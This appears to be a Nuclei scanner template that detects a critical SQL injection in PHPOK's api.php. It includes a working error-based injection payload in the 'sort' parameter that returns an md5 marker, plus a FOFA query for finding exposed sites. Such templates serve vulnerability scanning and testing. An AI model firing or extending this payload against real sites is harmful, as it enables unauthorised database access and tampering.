id: phpok-sqli

info:
  name: PHPOK - SQL Injection
  author: ritikchaddha
  severity: critical
  description: PHPOK contains a SQL injection vulnerability via a GET request. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://cve.report/software/phpok/phpok
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-89
    cpe: cpe:2.3:a:phpok:phpok:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="phpok"
    product: phpok
    vendor: phpok
  tags: phpok,sqli
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - '{{BaseURL}}/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{num}}))) --+'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'
# digest: 490a0046304402206f082b6376e7455e3e7275e6f0cc9f753a4400dc1edfb4d8f5774a372f86fb8d02207518c7ab5081f64b8cc2c0fcf3609e09b5dc96464629dc3df12f406fc2196d77:922c64590222798bb761d5b6d8e72950